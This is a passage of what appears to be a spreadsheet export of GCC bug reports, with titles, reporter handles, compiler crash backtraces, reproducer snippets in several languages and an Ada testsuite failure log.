./bug[0x40272a]
./bug[0x40283c]
/lib/libc.so.6(__libc_start_main+0xe6)[0x7f516d9255c6]
./bug[0x4007b9]
[...]
Aborted
module mod_all
 implicit none
 public :: &amp;
   t2 new2 operator(+)
 private
 type t1
   integer :: n1
   integer allocatable :: d1(:)
 end type t1
 type t2
   integer :: n2
   type(t1) allocatable :: d2(:)
 end type t2
 interface operator(+)
   module procedure add
 end interface
 interface new2
   module procedure new2 new2_2
 end interface 
contains
!-----------------------------------------------------------------------
 pure function new1(d1) result(m)
  integer intent(in) :: d1(:)
  type(t1) :: m
   m%n1 = size(d1)
   allocate(m%d1(m%n1))
   m%d1 = d1
 end function new1
!-----------------------------------------------------------------------
 pure function new2(d2) result(p)
  type(t1) intent(in) :: d2(:)
  type(t2) :: p
   p%n2 = size(d2)
   allocate(p%d2(p%n2))
   p%d2 = d2
 end function new2
!-----------------------------------------------------------------------
 pure function new2_2() result(p)
  type(t2) :: p
   p = new2( (/ new1((/11/)) /) )
 end function new2_2
!-----------------------------------------------------------------------
 elemental function add(p1p2) result(p)
  type(t2) intent(in) :: p1p2
  type(t2) :: p
   p = new2((/ p1%d2  p2%d2 /))
 end function add
!-----------------------------------------------------------------------
end module mod_all
!-----------------------------------------------------------------------
program a_main
 use mod_all
 type(t2) :: q(3)
  q(1) = new2()
  q(2) = new2()
  q(3) = q(2) + q(1)
end program a_main</t>
  </si>
  <si>
    <t>GCC-3038</t>
  </si>
  <si>
    <t>inconsistent operand constraints: =m ... 0</t>
  </si>
  <si>
    <t xml:space="preserve">	
This valid line will get rejected:
      __asm __volatile ( : =m (lock-&gt;__status) : 0 (lock-&gt;__status))
This work-around will build:
      __asm __volatile ( : +m (lock-&gt;__status))
The error message:
    spinlock.c: In function `__pthread_lock':
    spinlock.c:91: inconsistent operand constraints in an `asm'
Additional Information:
The line has been added by Ulrich Drepper to glibc-2.2.3's
linuxthreads module.
The same error occurs consistently with gcc 2.95.2 &amp; gcc-20010514 and
has occured elsewhere (see
http://bugs.gnu.org/cgi-bin/gnatsweb.pl?cmd=view&amp;pr=2230&amp;database=default).
I tried to trace it thru cc1 but lost track of the looped bison calls
(yyparse_1()). Besides I do not know bison and precious little
asm/x86 knowledge.
Dirk Mueller's Closed PR
  http://gcc.gnu.org/cgi-bin/gnatsweb.pl?cmd=view&amp;pr=2721&amp;database=gcc
seems to have a symmetric relationship to this one.
Release:
3.0 20010528 (prerelease)
Environment:
System: Linux tanenbaum 2.4.0-test11 #1 Sun Dec 31 00:48:31 CST 2000 i586 unknown
Architecture: i586
host: i586-pc-linux-gnu
build: i586-pc-linux-gnu
target: i586-pc-linux-gnu
configured with: ../../cvs/gcc/configure --prefix=/home2/alih
How-To-Repeat:
The bzipped uuencoded .i file is enclosed. It follows the compiler
output. ('falih' is just the file which contains the long cmdline for
compiling thsi single file.) Here's the compiler output:
/home2/alih/glibc-2.2.3/source/linuxthreads/ sh falih
Reading specs from /home/alih/opt/bin/../lib/gcc-lib/i586-pc-linux-gnu/3.0/specs
Configured with: ../../cvs/gcc/configure --prefix=/home2/alih
Thread model: single
gcc version 3.0 20010528 (prerelease)
GNU CPP version 3.0 20010528 (prerelease) (cpplib) (i386 Linux/ELF)
#include ... search starts here:
#include  search starts here:
 ../include
 .
 /home/alih/opt/glibc-2.2.3/build_2.2/linuxthreads
 ..
 ../libio
 /home/alih/opt/glibc-2.2.3/build_2.2
 ../sysdeps/i386/elf
 ../linuxthreads/sysdeps/unix/sysv/linux/i386
 ../linuxthreads/sysdeps/unix/sysv/linux
 ../linuxthreads/sysdeps/pthread
 ../linuxthreads/sysdeps/unix/sysv
 ../linuxthreads/sysdeps/unix
 ../linuxthreads/sysdeps/i386/i586
 ../linuxthreads/sysdeps/i386
 ../sysdeps/unix/sysv/linux/i386
 ../sysdeps/unix/sysv/linux
 ../sysdeps/gnu
 ../sysdeps/unix/common
 ../sysdeps/unix/mman
 ../sysdeps/unix/inet
 ../sysdeps/unix/sysv/i386
 ../sysdeps/unix/sysv
 ../sysdeps/unix/i386
 ../sysdeps/unix
 ../sysdeps/posix
 ../sysdeps/i386/i586
 ../sysdeps/i386/i486
 ../sysdeps/i386/fpu
 ../sysdeps/i386
 ../sysdeps/wordsize-32
 ../sysdeps/ieee754/ldbl-96
 ../sysdeps/ieee754/dbl-64
 ../sysdeps/ieee754/flt-32
 ../sysdeps/ieee754
 ../sysdeps/generic/elf
 ../sysdeps/generic
 /usr/lib/gcc-lib/i386-linux/2.95.2/include
 /home/alih/src/linux-2.2.14/include
End of search list.
 /home/alih/opt/bin/../lib/gcc-lib/i586-pc-linux-gnu/3.0/cc1 -fpreprocessed spinlock.i -quiet -dumpbase spinlock.c -Wall -Winline -Wstrict-prototypes -Wwrite-strings -version -o spinlock.s
GNU CPP version 3.0 20010528 (prerelease) (cpplib) (i386 Linux/ELF)
GNU C version 3.0 20010528 (prerelease) (i586-pc-linux-gnu)
        compiled by GNU C version 3.0 20010528 (prerelease).
spinlock.c: In function `__pthread_lock':
spinlock.c:91: inconsistent operand constraints in an `asm'
Ã›Â²Â±Â°alih@tanenbaumÃ›Â²Â±Â° Sat Jun  2 07:35:53pm 
/home2/alih/glibc-2.2.3/source/linuxthreads/ 
The .i file follows:</t>
  </si>
  <si>
    <t>a.bahar, alih</t>
  </si>
  <si>
    <t>GCC-58561</t>
  </si>
  <si>
    <t>[4.8 Regression] [c++11] ICE using declaration of function with auto in return type</t>
  </si>
  <si>
    <t>The following (valid?) code snippet (compiled with -std=c++0x -g) triggers an ICE since GCC 4.8.0:
=================
auto foo()
namespace N
{
  using ::foo
}
=================
bug.cc:1:10: warning: 'foo' function uses 'auto' type specifier without trailing return type [enabled by default]
 auto foo()
          ^
bug.cc:5:11: internal compiler error: in is_base_type at dwarf2out.c:10146
   using ::foo
           ^
0x86a0f6 is_base_type
        ../../gcc/gcc/dwarf2out.c:10146
0x86a0f6 modified_type_die
        ../../gcc/gcc/dwarf2out.c:10337
0x86b58a add_type_attribute
        ../../gcc/gcc/dwarf2out.c:16702
0x861250 gen_subprogram_die
        ../../gcc/gcc/dwarf2out.c:17895
0x86a42a force_decl_die
        ../../gcc/gcc/dwarf2out.c:19955
0x87b0e2 dwarf2out_imported_module_or_decl_1
        ../../gcc/gcc/dwarf2out.c:20398
0x70bcf6 cp_emit_debug_info_for_using(tree_node* tree_node*)
        ../../gcc/gcc/cp/name-lookup.c:6206
0x70be53 do_toplevel_using_decl(tree_node* tree_node* tree_node*)
        ../../gcc/gcc/cp/name-lookup.c:3939
0x655204 cp_parser_using_declaration
        ../../gcc/gcc/cp/parser.c:15771
0x6559ec cp_parser_block_declaration
        ../../gcc/gcc/cp/parser.c:10848
0x65e7fe cp_parser_declaration
        ../../gcc/gcc/cp/parser.c:10764
0x65d55d cp_parser_declaration_seq_opt
        ../../gcc/gcc/cp/parser.c:10650
0x65d770 cp_parser_namespace_body
        ../../gcc/gcc/cp/parser.c:15568
0x65d770 cp_parser_namespace_definition
        ../../gcc/gcc/cp/parser.c:15549
0x65e8f1 cp_parser_declaration
        ../../gcc/gcc/cp/parser.c:10752
0x65d55d cp_parser_declaration_seq_opt
        ../../gcc/gcc/cp/parser.c:10650
0x65ee46 cp_parser_translation_unit
        ../../gcc/gcc/cp/parser.c:3939
0x65ee46 c_parse_file()
        ../../gcc/gcc/cp/parser.c:28898
0x772524 c_common_parse_file()
        ../../gcc/gcc/c-family/c-opts.c:1046
Please submit a full bug report [etc.]</t>
  </si>
  <si>
    <t>GCC-47787</t>
  </si>
  <si>
    <t>[4.6 Regression] GCC with -flto combines preprocessed C sources</t>
  </si>
  <si>
    <t>Compile testcase in attachment 23385 (bug 47786) with `gcc -v -flto -o /dev/null main.i foo.i':
/usr/local/libexec/gcc/i686-pc-linux-gnu/4.6.0/cc1 -fpreprocessed main.i foo.i -quiet -dumpbase main.i -mtune=generic -march=pentiumpro -auxbase main -version -flto -o /tmp/cc3eBz9m.s
I don't think it is an intended behavior.</t>
  </si>
  <si>
    <t>GCC-21391</t>
  </si>
  <si>
    <t>[4.1 Regression] referencing a type via a cast does not emit it for debug (feliminate-unused-debug-types)</t>
  </si>
  <si>
    <t>Test program:
struct foo 
{
    int i
}
int bar (void)
{
    return ((struct foo *)0x1234)-&gt;i
}
Compile with -g readelf does NOT show a definition of struct foo in the debug
data.
If I compile with  -fno-eliminate-unused-debug-types the definition does
appear but in the example program foo isn't unused.</t>
  </si>
  <si>
    <t>pkoning</t>
  </si>
  <si>
    <t>GCC-62235</t>
  </si>
  <si>
    <t>segmentation fault on Ada 2012 code</t>
  </si>
  <si>
    <t>Created attachment 33381
Apply gnatchop to this file
Apply gnatchop to all.chop (attached).
$ gnatgcc -v
Using built-in specs.
COLLECT_GCC=gnatgcc
COLLECT_LTO_WRAPPER=/usr/lib/gcc/i586-linux-gnu/4.9/lto-wrapper
Target: i586-linux-gnu
Configured with: ../src/configure -v --with-pkgversion='Debian 4.9.1-4' --with-bugurl=file:///usr/share/doc/gcc-4.9/README.Bugs --enable-languages=cc++javagodfortranobjcobj-c++ --prefix=/usr --program-suffix=-4.9 --enable-shared --enable-linker-build-id --libexecdir=/usr/lib --without-included-gettext --enable-threads=posix --with-gxx-include-dir=/usr/include/c++/4.9 --libdir=/usr/lib --enable-nls --with-sysroot=/ --enable-clocale=gnu --enable-libstdcxx-debug --enable-libstdcxx-time=yes --enable-gnu-unique-object --disable-vtable-verify --enable-plugin --with-system-zlib --disable-browser-plugin --enable-java-awt=gtk --enable-gtk-cairo --with-java-home=/usr/lib/jvm/java-1.5.0-gcj-4.9-i386/jre --enable-java-home --with-jvm-root-dir=/usr/lib/jvm/java-1.5.0-gcj-4.9-i386 --with-jvm-jar-dir=/usr/lib/jvm-exports/java-1.5.0-gcj-4.9-i386 --with-arch-directory=i386 --with-ecj-jar=/usr/share/java/eclipse-ecj.jar --enable-objc-gc --enable-targets=all --enable-multiarch --with-arch-32=i586 --with-multilib-list=m32m64mx32 --enable-multilib --with-tune=generic --enable-checking=release --build=i586-linux-gnu --host=i586-linux-gnu --target=i586-linux-gnu
Thread model: posix
gcc version 4.9.1 (Debian 4.9.1-4)
$ gnatgcc -c -fPIC -g -O2 -gnat2012 -g -O0 -gnato -fstack-check -gnatVa rdf-raptor-log.adb
+===========================GNAT BUG DETECTED==============================+
| 4.9.1 (i586-linux-gnu) Storage_Error stack overflow or erroneous memory access|
| Error detected at rdf-auxilary-handled_record.adb:1:1 [rdf-raptor-log.ads:32:4]|
| Please submit a bug report see http://gcc.gnu.org/bugs.html.            |
| Use a subject line meaningful to you and us to track the bug.            |
| Include the entire contents of this bug box in the report.               |
| Include the exact gcc-4.9 or gnatmake command that you entered.          |
| Also include sources listed below in gnatchop format                     |
| (concatenated together with no headers between files).                   |
+==========================================================================+
Please include these source files with error report
Note that list may not be accurate in some cases
so please double check that the problem can still
be reproduced with the set of files listed.
Consider also -gnatd.n switch (see debug.adb).
rdf-raptor-log.adb
rdf-raptor-log.ads
rdf-raptor.ads
rdf.ads
rdf-auxilary.ads
rdf-auxilary-handled_record.ads
rdf-raptor-uri.ads
rdf-raptor-world.ads
rdf-auxilary-limited_handled_record.ads
rdf-raptor-iostream.ads
rdf-raptor-term.ads
rdf-raptor-namespaces_stacks.ads
rdf-raptor-namespaces.ads
rdf-raptor-statement.ads
rdf-raptor-memory.ads
rdf-auxilary-handled_record.adb
compilation abandoned</t>
  </si>
  <si>
    <t>porton</t>
  </si>
  <si>
    <t>GCC-58451</t>
  </si>
  <si>
    <t>ICE with segfault at -O3 on x86_64-linux-gnu (both 32-bit and 64-bit modes)</t>
  </si>
  <si>
    <t>The following code causes an ICE when compiled with the current gcc trunk at -O3 on x86_64-linux in both 32-bit and 64-bit modes. 
This is a regression from 4.8.x. 
$ gcc-trunk -v
Using built-in specs.
COLLECT_GCC=gcc-trunk
COLLECT_LTO_WRAPPER=/usr/local/gcc-trunk/libexec/gcc/x86_64-unknown-linux-gnu/4.9.0/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: ../gcc-trunk/configure --enable-languages=cc++objcobj-c++fortranlto --with-gmp=/usr/local/gcc-trunk --with-mpfr=/usr/local/gcc-trunk --with-mpc=/usr/local/gcc-trunk --with-cloog=/usr/local/gcc-trunk --prefix=/usr/local/gcc-trunk
Thread model: posix
gcc version 4.9.0 20130917 (experimental) [trunk revision 202643] (GCC) 
$ gcc-trunk -O2 -c small.c
$ gcc-4.8 -O3 -c small.c
$ gcc-trunk -O3 -c small.c
small.c: In function â€˜fooâ€™:
small.c:3:6: internal compiler error: Segmentation fault
 void foo ()
      ^
0x9249bf crash_signal
        ../../gcc-trunk/gcc/toplev.c:335
0xa2719d find_uses_to_rename_use
        ../../gcc-trunk/gcc/tree-ssa-loop-manip.c:369
0xa273d6 find_uses_to_rename_bb
        ../../gcc-trunk/gcc/tree-ssa-loop-manip.c:427
0xa27b6d find_uses_to_rename
        ../../gcc-trunk/gcc/tree-ssa-loop-manip.c:451
0xa27b6d rewrite_into_loop_closed_ssa(bitmap_head_def* unsigned int)
        ../../gcc-trunk/gcc/tree-ssa-loop-manip.c:513
0x995070 tree_loop_distribution
        ../../gcc-trunk/gcc/tree-loop-distribution.c:1738
0x995070 execute
        ../../gcc-trunk/gcc/tree-loop-distribution.c:1781
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
$ 
-------------------------------------------
int *a[2] b c d e
void foo ()
{
  for (b = 1 b &gt;= 0 b--)
    if (e)
      {
        a[b] = 0
        c = d = 0
      }
}</t>
  </si>
  <si>
    <t>GCC-71494</t>
  </si>
  <si>
    <t>[4.9 Regression] label as value in nested function</t>
  </si>
  <si>
    <t>Created attachment 38676
sample source
goto *label leads to the internal compiler error when used in nested function
$ gcc main.c
main.c: In function â€˜testâ€™:
main.c:7:3: internal compiler error: in expand_expr_real_1 at expr.c:9651
   goto *label
   ^~~~
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>mike.osipov</t>
  </si>
  <si>
    <t>GCC-77455</t>
  </si>
  <si>
    <t>[AArch64] eh_return implementation fails</t>
  </si>
  <si>
    <t>The __builtin_eh_return implementation on AArch64 generates incorrect code for many cases due to using an incorrect offset/pointer when writing the new return address to the stack. Also optimizations may remove the write due to a missing scheduling barrier. As a result in most cases eh_return does not work properly.</t>
  </si>
  <si>
    <t>GCC-68256</t>
  </si>
  <si>
    <t>Defining TARGET_USE_CONSTANT_BLOCKS_P causes go bootstrap failure on aarch64.</t>
  </si>
  <si>
    <t>https://gcc.gnu.org/ml/gcc-patches/2015-11/msg00839.html</t>
  </si>
  <si>
    <t>GCC-30027</t>
  </si>
  <si>
    <t>Crash in get_memory_rtx at builtins.c:1086</t>
  </si>
  <si>
    <t>gcc -c p_aae_ts_control.adb
+===========================GNAT BUG DETECTED==============================+
| 4.1.0 (i686-pc-linux-gnu) in get_memory_rtx at builtins.c:1086          |
| Error detected at p_aae_ts_control.adb:44:5                              |
| Please submit a bug report see http://gcc.gnu.org/bugs.html.            |
| Use a subject line meaningful to you and us to track the bug.            |
| Include the entire contents of this bug box in the report.               |
| Include the exact gcc or gnatmake command that you entered.              |
| Also include sources listed below in gnatchop format                     |
| (concatenated together with no headers between files).                   |
+==========================================================================+</t>
  </si>
  <si>
    <t>oliver.kellogg</t>
  </si>
  <si>
    <t>GCC-79133</t>
  </si>
  <si>
    <t>lambda capture shadowing parameter &amp; decltype confusion</t>
  </si>
  <si>
    <t>Created attachment 40535
reproducer
When a simple lambda capture and a lambda parameter share a name the capture object is seen inside the lambda.  Except inside decltype which sees the parameter.
The attached testcase produces (at -O2):
	subq	$8 %rsp
	movl	$1 %edi &lt;-- size of lambda parm 'z'
	call	_Z3Barj
	movl	$4 %edi &lt;-- size of lambda capture 'z'
	call	_Z3Barj
	movl	$5 %eax &lt;-- value of lambda capture 'z'
	addq	$8 %rsp
	ret
Possibly related email:
https://gcc.gnu.org/ml/gcc-patches/2017-01/msg01331.html</t>
  </si>
  <si>
    <t>GCC-23646</t>
  </si>
  <si>
    <t>[4.1 Regression] Ada testsuite hangs -- many new failures</t>
  </si>
  <si>
    <t>gnatmake is /home/dave/gnu/gcc-4.0/objdir/gcc/gnatmake
                === acats support ===
Generating support files... done.
Compiling support files... done.
                === acats tests ===
Running chapter a ...
FAIL:   a87b59a
Running chapter c2 ...
Running chapter c3 ...
FAIL:   c32001e
FAIL:   c32111a
FAIL:   c32111b
FAIL:   c32112b
FAIL:   c32113a
FAIL:   c32115a
FAIL:   c32115b
FAIL:   c330001
FAIL:   c330002
FAIL:   c34001c
FAIL:   c34001f
FAIL:   c34002c
FAIL:   c34003c
FAIL:   c34005c
FAIL:   c34005f
FAIL:   c34005i
FAIL:   c34005l
FAIL:   c34005o
FAIL:   c34005r
FAIL:   c34005u
FAIL:   c34006f
FAIL:   c34006l
FAIL:   c34007a
FAIL:   c34007d
FAIL:   c34007f
FAIL:   c34007g
FAIL:   c34007i
FAIL:   c34007j
FAIL:   c34007m
FAIL:   c34007p
FAIL:   c34007r
FAIL:   c34007s
FAIL:   c34007u
FAIL:   c34009f
FAIL:   c34009l
FAIL:   c34011b
FAIL:   c34018a
FAIL:   c35003a
FAIL:   c35003b
FAIL:   c35003d
FAIL:   c354002
FAIL:   c354003
FAIL:   c35502c
FAIL:   c35502e
FAIL:   c35502k
FAIL:   c35502l
FAIL:   c35502m
FAIL:   c35502n
FAIL:   c35503c
FAIL:   c35503e
FAIL:   c35505c
FAIL:   c35505e
FAIL:   c35505f
FAIL:   c35507c
FAIL:   c35507e
FAIL:   c35507k
FAIL:   c35507l
FAIL:   c35507m
FAIL:   c35507n
FAIL:   c35508c
FAIL:   c35508e
FAIL:   c35508g
FAIL:   c35508h
FAIL:   c35508k
FAIL:   c35508l
FAIL:   c35904a
FAIL:   c35904b
FAIL:   c36104a
FAIL:   c36104b
FAIL:   c36172a
FAIL:   c36172b
FAIL:   c36204c
FAIL:   c36301a
FAIL:   c36305a
FAIL:   c37005a
FAIL:   c37008a
FAIL:   c37010a
FAIL:   c371001
FAIL:   c371002
FAIL:   c371003
FAIL:   c37108b
FAIL:   c37207a
FAIL:   c37208a
FAIL:   c37208b
FAIL:   c37209b
FAIL:   c37211a
FAIL:   c37211b
FAIL:   c37211c
FAIL:   c37211d
FAIL:   c37211e
FAIL:   c37213b
FAIL:   c37213d
FAIL:   c37213f
FAIL:   c37213h
FAIL:   c37213j
FAIL:   c37213k
FAIL:   c37213l
FAIL:   c37215b
FAIL:   c37215d
FAIL:   c37215f
FAIL:   c37215h
FAIL:   c37217a
FAIL:   c37217b
FAIL:   c37217c
FAIL:   c380001
FAIL:   c380003
FAIL:   c38002a
FAIL:   c38002b
FAIL:   c38107a
FAIL:   c38107b
FAIL:   c38202a
FAIL:   c390002
FAIL:   c390010
FAIL:   c39006a
FAIL:   c39006b
FAIL:   c39006c
FAIL:   c39006d
FAIL:   c39006g
FAIL:   c39007a
FAIL:   c39007b
FAIL:   c39008a
FAIL:   c39008b
FAIL:   c39008c
FAIL:   c391001
FAIL:   c393a06
FAIL:   c3a0014
FAIL:   c3a2002
FAIL:   c3a2003
FAIL:   c3a2a01
FAIL:   c3a2a02
Running chapter c4 ...
FAIL:   c410001
FAIL:   c41104a
FAIL:   c41105a
FAIL:   c41204a
FAIL:   c41205a
FAIL:   c41304a
FAIL:   c41304b
FAIL:   c41401a
FAIL:   c420001
FAIL:   c42006a
FAIL:   c43004a
FAIL:   c43004c
FAIL:   c43104a
FAIL:   c432002
FAIL:   c432003
FAIL:   c43206a
FAIL:   c43207b
FAIL:   c43211a
FAIL:   c43212a
FAIL:   c43212c
FAIL:   c43214a
FAIL:   c43215a
FAIL:   c43215b
FAIL:   c433001
FAIL:   c45113a
FAIL:   c45281a
FAIL:   c45282b
FAIL:   c45304a
FAIL:   c45304b
FAIL:   c45304c
FAIL:   c45504a
FAIL:   c45504b
FAIL:   c45504c
FAIL:   c45504d
FAIL:   c45504e
FAIL:   c45504f
FAIL:   c45534b
FAIL:   c45613a
FAIL:   c45613b
FAIL:   c45613c
FAIL:   c45614a
FAIL:   c45614b
FAIL:   c45614c
FAIL:   c45632a
FAIL:   c45632b
FAIL:   c45632c
FAIL:   c45651a
FAIL:   c460001
FAIL:   c460002
FAIL:   c460004
FAIL:   c460005
FAIL:   c460008
FAIL:   c460009
FAIL:   c460011
FAIL:   c460012
FAIL:   c46014a
FAIL:   c46043b
FAIL:   c46044b
FAIL:   c46052a
FAIL:   c46053a
FAIL:   c46054a
FAIL:   c460a01
FAIL:   c460a02
FAIL:   c47002c
FAIL:   c47003a
FAIL:   c47004a
FAIL:   c47005a
FAIL:   c47006a
FAIL:   c47007a
FAIL:   c47008a
FAIL:   c47009a
FAIL:   c48006b
FAIL:   c48007a
FAIL:   c48007b
FAIL:   c48007c
FAIL:   c48008a
FAIL:   c48008c
FAIL:   c48009a
FAIL:   c48009b
FAIL:   c48009c
FAIL:   c48009d
FAIL:   c48009e
FAIL:   c48009f
FAIL:   c48009g
FAIL:   c48009h
FAIL:   c48009i
FAIL:   c48009j
FAIL:   c4a005b
FAIL:   c4a006a
Running chapter c5 ...
FAIL:   c52005a
FAIL:   c52005b
FAIL:   c52005c
FAIL:   c52005d
FAIL:   c52005e
FAIL:   c52005f
FAIL:   c52008a
FAIL:   c52008b
FAIL:   c52009a
FAIL:   c52009b
FAIL:   c52011a
FAIL:   c52011b
FAIL:   c52101a
FAIL:   c52103x
FAIL:   c52104a
FAIL:   c52104b
FAIL:   c52104c
FAIL:   c52104f
FAIL:   c52104g
FAIL:   c52104h
FAIL:   c52104k
FAIL:   c52104l
FAIL:   c52104m
FAIL:   c52104p
FAIL:   c52104q
FAIL:   c52104r
FAIL:   c52104x
FAIL:   c52104y
FAIL:   c55b15a
FAIL:   c58005a
FAIL:   c58005b
FAIL:   c58005h
FAIL:   c58006a
FAIL:   c58006b
FAIL:   c59002a
Running chapter c6 ...
FAIL:   c61008a
FAIL:   c62003a
FAIL:   c62003b
FAIL:   c641001
FAIL:   c64103b
FAIL:   c64103c
FAIL:   c64103d
FAIL:   c64103e
FAIL:   c64103f
FAIL:   c64104a
FAIL:   c64104b
FAIL:   c64104c
FAIL:   c64104d
FAIL:   c64104e
FAIL:   c64104f
FAIL:   c64104g
FAIL:   c64104h
FAIL:   c64104i
FAIL:   c64104j
FAIL:   c64104k
FAIL:   c64104l
FAIL:   c64104m
FAIL:   c64104n
FAIL:   c64104o
FAIL:   c64105b
FAIL:   c64106a
FAIL:   c64106b
FAIL:   c64106c
FAIL:   c64201b
FAIL:   c650001
FAIL:   c65003a
FAIL:   c65003b
Running chapter c7 ...
/bin/sh: line 1: 26947 Killed                  ${testdir}/run_acats
Last successful build and run was updated Mon Aug 29 03:22:25 UTC 2005</t>
  </si>
  <si>
    <t>GCC-35504</t>
  </si>
  <si>
    <t>incorrect code generated on i386 for C++ multiple inheritance large return structures and regparm or fastcall calling conventions</t>
  </si>
  <si>
    <t>Hi
When GCC generates virtual methods for objects with multiple inheritance it creates special thunk functions that adjust this pointer and jump to an original method.
When a member function returns a structure the first argument is a pointer where return structure should be placed the second argument is this pointer and additional arguments are arguments of the member function. When using regparm 2 or 3 the first argument (ptr to return structure) is in EAX the second argument (this) is in EDX and additional arguments are in ECX and on the stack.
The thunking function is generated incorrectly and always tries to adjust EAX causing corruption to this pointer and to the return value.
Similarly when using fastcall convention the pointer to return structure is in ECX and this is in EDX however thunking function adjusts ECX.
This bug is present in all GCC releases.</t>
  </si>
  <si>
    <t>GCC-460</t>
  </si>
  <si>
    <t>__func__ semantics</t>
  </si>
  <si>
    <t>The detailed semantics of __func__ in GCC differ from those of the C99
standard:
* __func__ is not a string literal and should not take part in string
  concatenation.
* Nor should __func__ be merged with identical string literals it is
  a separate array object.
* __func__ is an array of const char not of plain char.  This should
  not depend on -Wwrite-strings or -fwritable-strings.
Release:
2.96
Environment:
System: Linux decomino 2.2.16 #1 Thu Jun 8 00:26:22 UTC 2000 i686 unknown
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
How-To-Repeat:
See gcc.dg/c99-func-2.c for the first point.  Another test may be
written for the other points.</t>
  </si>
  <si>
    <t>GCC-27477</t>
  </si>
  <si>
    <t>The H8 port doesn't build</t>
  </si>
  <si>
    <t>While building libstdc++ the build breaks.</t>
  </si>
  <si>
    <t>GCC-34708</t>
  </si>
  <si>
    <t>Inlining heuristics issue</t>
  </si>
  <si>
    <t>openbabel doesn't build on ppc64-linux with 4.3 (works with 4.1) with -mminimal-toc -O2 -fPIC .toc1 section overflows (is bigger than 64KB).
About 2/3 of .toc1 entries are as with 4.1 various pointers to .rodata.str1.8
(i.e. string literals) but newly there are over 3600 pointers into .text.
This comes down to:
static __attribute__ ((__unused__)) const char*
SWIG_Perl_ErrorType(int code) {
  const char* type = 0
  switch(code) {
  case -12:
    type = MemoryError
    break
  case -2:
    type = IOError
    break
  case -3:
    type = RuntimeError
    break
  case -4:
    type = IndexError
    break
  case -5:
    type = TypeError
    break
  case -6:
    type = ZeroDivisionError
    break
  case -7:
    type = OverflowError
    break
  case -8:
    type = SyntaxError
    break
  case -9:
    type = ValueError
    break
  case -10:
    type = SystemError
    break
  case -11:
    type = AttributeError
    break
  default:
    type = RuntimeError
  }
  return type
}
extern C int puts (const char *)
void f1 (int code)
{
  puts (SWIG_Perl_ErrorType (code))
}
void f2 (int code)
{
  puts (SWIG_Perl_ErrorType (code))
}
void f3 (int code)
{
  puts (SWIG_Perl_ErrorType (code))
}
void f4 (int code)
{
  puts (SWIG_Perl_ErrorType (code))
}
void f5 (int code)
{
  puts (SWIG_Perl_ErrorType (code))
}
where 4.1 doesn't inline the SWIG_Perl_ErrorType function at -O2 but 4.3 does
because of -finline-small-functions.  SWIG_Perl_ErrorType isn't very small
though especially with -fPIC it is fairly expensive a bigger SWITCH_EXPR
which needs to use a jump table and then a dozen of string literal loads.
estimate_num_insns guesses 1 though :(.</t>
  </si>
  <si>
    <t>GCC-7726</t>
  </si>
  <si>
    <t>(type-punning failure) Fails to produce the correct implementation-dependent output for loop optimization under x86 -&gt; optimizes away a loop that should complete</t>
  </si>
  <si>
    <t>Fails to produce the correct implementation-dependant output.
The compiler optimizes away the while loop that would 
eventually exit.
With 'gcc -O9 -o test test.c'
On the following compilers:
Reading specs from /usr/lib/gcc-lib/i386-linux/2.95.4/specs
gcc version 2.95.4 20011002 (Debian prerelease)
Reading specs from /usr/lib/gcc-lib/i386-linux/3.0.4/specs
Configured with: ../src/configure -v --enable-languages=cc++javaf77objc --prefix=/usr --
infodir=/share/info --mandir=/share/man --enable-shared --with-gnu-as --with-gnu-ld --with-s
ystem-zlib --enable-long-long --enable-nls --without-included-gettext --disable-checking --e
nable-threads=posix --enable-java-gc=boehm --with-cpp-install-dir=bin --enable-objc-gc i386-
linux
Thread model: posix
gcc version 3.0.4
Reading specs from /usr/lib/gcc-lib/i386-linux/3.1.1/specs
Configured with: /mnt/data/gcc-3.1/gcc-3.1-3.1.1ds2/src/configure -v --enable-languages=cc+
+javaf77protoobjcada --prefix=/usr --mandir=/usr/share/man --infodir=/usr/share/info --
with-gxx-include-dir=/usr/include/g++-v3-3.1 --enable-shared --with-system-zlib --enable-lon
g-long --enable-nls --without-included-gettext --enable-clocale=gnu --enable-__cxa_atexit --
enable-threads=posix --enable-java-gc=boehm --enable-objc-gc i386-linux
Thread model: posix
gcc version 3.1.1 20020703 (Debian prerelease)
---
union sconvert {
        unsigned int uval
        signed int sval
}
int main()
{
        union sconvert i = { 0 }
        union sconvert oldi = { 0 }
        i.uval++
        while (i.sval &gt; oldi.sval) {
                oldi = i
                i.uval++
        }
        return oldi.sval
}
---
Signed overflow is undefined in ANSI C but this
particular example uses defined unsigned overflow to
carry out the addition.
The comparison is between to signed values that gcc
must convert. This conversion is implementation-dependant.
As such the implementation-dependant behaviour cannot
be optimized away and must remain consistent across 
optimization levels.
This bug is a correction/refinement of a previous bug that 
incorrectly assumed signed overflow to be defined.
Release:
gcc version 3.1.1 20020703 (Debian prerelease)
Environment:
gcc       2.95.4-16         The GNU C compiler.
gcc-3.0   3.0.4-10          The GNU C compiler.
gcc-3.1   3.1.1-0pre3       The GNU C compiler.
libc6     2.2.5-7           GNU C Library
binutils  2.12.90.0.9-1     GNU Binutils
(Slightly modified dpkg -l output)
How-To-Repeat:
Insert the code in 'Description' -&gt; test.c
$ gcc -O9 -o test test.c
$ ./test
This will run forever since the exit case for the loop
has been optimized away.</t>
  </si>
  <si>
    <t>GCC-77985</t>
  </si>
  <si>
    <t>DW_AT_comp_dir is omitted when filename is absolute and the file does not contain a specific typedef</t>
  </si>
  <si>
    <t>Hi GCC 7.0.0 (latest snapshot) and GCC 6.1.1 both exhibit the following behaviour:
+ gcc-build/destdir/usr/local/bin/gcc --version
gcc (GCC) 7.0.0 20161009 (experimental)
Copyright (C) 2016 Free Software Foundation Inc.
This is free software see the source for copying conditions.  There is NO
warranty not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
+ cat test0.c
typedef __builtin_va_list __gnuc_va_list
void func (void) {}
+ cat test1.c
void func (void) {}
+ gcc-build/destdir/usr/local/bin/gcc test0.c -g -dA -S -o- | grep comp_dir
	.long	.LASF4	# DW_AT_comp_dir: /home/infinity0/var/lib/reproducible
	.uleb128 0x1b	# (DW_AT_comp_dir)
+ gcc-build/destdir/usr/local/bin/gcc test1.c -g -dA -S -o- | grep comp_dir
	.long	.LASF2	# DW_AT_comp_dir: /home/infinity0/var/lib/reproducible
	.uleb128 0x1b	# (DW_AT_comp_dir)
